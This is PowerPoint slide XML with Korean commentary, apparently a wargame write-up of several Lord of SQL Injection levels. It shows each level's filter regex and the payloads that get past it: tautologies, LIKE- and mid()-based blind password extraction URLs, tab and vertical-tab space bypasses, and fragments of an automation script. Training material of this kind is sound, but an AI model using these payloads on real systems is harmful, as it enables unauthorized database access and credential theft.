            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='' or id='admin' and pw='a'='a' or 'a'='a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>' and 1=0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조건</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t> 'guest' and pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>참 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>거짓 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>거짓</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1">
              <a:solidFill>
                <a:srgbClr val="FF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조건</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id='admin' and pw='a'='a' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>참 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>참 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>참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3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'a'='a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>' and 1=0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>참 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>거짓 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>거짓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1,2,3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>연산자로 구분이 되어있고 조건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가 참이므로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>은 조건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에 맞는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 검색해준다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kumimoji="0" lang="ko-KR" altLang="ko-KR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6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B75F0-48C7-4470-8629-04A440B99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Golem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3B0566-DA0C-454E-9509-130A7B4F9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6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408EF-F4D5-44CA-A1A7-383FCEC1E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3657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prob_golem where id='guest'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5295D-CA14-4943-9BD7-046353D8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-271059"/>
            <a:ext cx="11930742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'/or|and|substr\(|=/i'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prob_golem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prob_golem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"golem"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이번에도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bling sql injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 이용하면 되지만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>이 필터링당하였다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그래서 방법을 바꿔야한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. LENGTH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>로 길이를 알아낸 후 정규식 특수문자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 이용해서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https://los.eagle-jump.org/golem_3~7.php?pw=' || id like 'admin' %26%26 pw like ‘8% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 입력해서 참값을 반환받는다면 첫글자는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>이고 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https://los.eagle-jump.org/golem_3~7.php?pw=' || id like 'admin' %26%26 pw like ‘88% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 입력해서 참값을 받환받는다면 두번째 글자도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>일것이다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이런식으로 자동화 프로그램을 만들면 풀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7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BFE3BE-DAFE-4353-86AA-B9B27897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72546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”// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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 값들이 저장될 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lang="ko-KR" altLang="en-US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변수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"https://los.eagle-jump.org/golem_3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7.php?pw=' || id like 'admin' %26%26 pw like '"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+result+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"%"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B3522-9709-4456-8494-7D2EEAEB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323"/>
            <a:ext cx="7753350" cy="229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8637AB-7D11-4968-9920-1057D1778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8" t="2750"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7753350" y="2585323"/>
            <a:ext cx="3611608" cy="34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7FB84-E057-43F4-9A21-B8B47EDBD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Darkknight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92646B-A413-4526-A894-9BF190591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2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F1B098-5E44-454E-8392-D120E2D56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prob_darkknight where id='guest' and pw='' and no=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57D34-CF31-4145-96A6-B3D44189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198821"/>
            <a:ext cx="12296956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'/\'|substr|ascii|=/i'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prob_darkknight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no=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prob_darkknight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"darkknight"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파라미터가 하나 더 생겼다는 것 말고는 기존 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>blind sql injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>과 똑같이 하면 풀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기존에 있던 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>guest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>조건을 없애기 위해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와 </a:t>
            </a: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에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>값을 넣어주고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>가 필터링 됐기 때문에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 사용하였다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https://los.eagle-jump.org/darkknight_f~d.php?pw=&amp;no="" or id like "admin" and pw like LENGTH(pw)=8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>로 길이를 찾고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762348-B89F-4E9C-8B3B-A863CE14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40" y="4093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prob_gremlin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DD05D2-D43D-4C47-B9EB-C180A961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40" y="337649"/>
            <a:ext cx="114233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//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not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attack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another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database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!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C1D8F-6F21-4BC6-A396-77B0D2527C1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384340" y="4030968"/>
            <a:ext cx="11595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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>로그인체크</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>와 연결</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>preg_match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>변수에다가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>입력받은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pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 받아서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>쿼리문을 저장</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p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lang="en-US" altLang="ko-KR"/>
              <a:t> // print</a:t>
            </a:r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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 수평선</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/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lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>진하게</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418699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8FA2E8-6AA5-462C-BD83-CFA838D0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111596"/>
            <a:ext cx="849463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"https://los.eagle-jump.org/darkknight_f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d.php?pw=&amp;no=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or id like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and pw like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+result+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"%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DA7FE-49F0-47A7-98B1-1ECDF496B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4" y="2696919"/>
            <a:ext cx="3686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9C37C-3515-4A01-80C5-B8C68FA98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Bugbear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3E8C6-C97A-4208-909C-0AECD3450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55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C396A30-EA28-42EC-94E8-9CE190F2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2555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prob_bugbear where id='guest' and pw='' and no=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19EBDE-7561-4253-A28F-537B7FE1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" y="255590"/>
            <a:ext cx="1207008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'/\'|substr|ascii|=|or|and| |like|0x/i'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prob_bugbear where id='guest'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no=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prob_bugbear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"bugbear"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substr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-&gt;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mid		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||		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-&gt;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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>26%26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		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-&gt;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in()		space -&gt; %09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https://los.eagle-jump.org/bugbear_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>8.php?pw=&amp;no=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>"" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>|| id in (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>%26%26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> mid(pw,1,1) in (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>)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https://los.eagle-jump.org/bugbear_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>8.php?pw=&amp;no=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>"" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>|| id in (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>%26%26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> mid(pw,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>,1) in (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>“2"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>)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pw=&amp;no=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>""%09</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>||%09id%09in%09(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>)%09%26%26%09mid(pw,1,1)%09in%09(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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7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F1744B-50F7-4AE5-97C4-FC517942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41796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"1234567890qwertyuiopasdfghjklzxcvbnm"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"https://los.eagle-jump.org/bugbear_4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8.php?pw=&amp;no=%22%22%09||%09id%09in%09(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admin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)%09%26%26%09mid(pw,"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",1)%09in%09(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\"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"PHPSESSID=at1hnisda74q053oos3u87ong2"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AB88A-5385-45F7-9B7B-68130858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323"/>
            <a:ext cx="8820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8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Giant	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56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6A5EAD-F4B5-44FA-BF01-7A4BA9E7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" y="226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1234 fromprob_giant where 1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E868-CEEC-4029-86F0-F5722B81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" y="80584"/>
            <a:ext cx="721223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strlen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shit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 |\n|\r|\t/i'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shit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1234 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shit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prob_giant where 1"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1234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"giant"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query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 보면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>porb_giant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>이 붙어있어 제대로 작동하지 않는다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공백을 넣어줘야  하는데 필터링이 되어있어서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다른 우회방법을 적용해야한다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%0b(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>수직</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tab)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 해보니 성공했다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06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Assassin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18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59D058-354F-4EE8-BDAA-F8652842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prob_assassin where pw like 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0D041-5A55-4AAE-87C2-F213532A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846"/>
            <a:ext cx="12444432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prob_assassin where pw like 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"assassin"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쿼리문을 조작하려면 싱글쿼터로 기존 쿼리문을 닫아주거나 열어줘야하는데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싱클쿼터가 제한되어 있고 우회도 통하지 않아서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>blind sql injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 해야하나 해서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넣어보니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 guest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끝까지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찾아보니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altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>83d2de10’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"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하지만 이것은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guest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였고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id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이여야 하니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wordlist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문자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을 맨뒤로 보내서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찾으려 했지만 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똑같이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‘83d2de10’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>이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도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로 시작</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>한다고 생각해서 맨앞자리를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>로 고정하고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번째 자리를 찾는데 이 때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 가장 뒤로 보내 </a:t>
            </a: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찾아봤지만 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역시 결과로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‘83d2de10’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"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admin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도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83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으로 시작</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>한다고 생각해서 앞자리를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>83</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>으로 고정하고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이번엔 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 가장 뒤로 보내고 찾았더니 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>832</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hello admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>이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admin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앞자리를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>832</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>로 고정한 후 찾아보니 최종적으로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832edd10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>가 나왔다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832%</a:t>
            </a:r>
            <a:r>
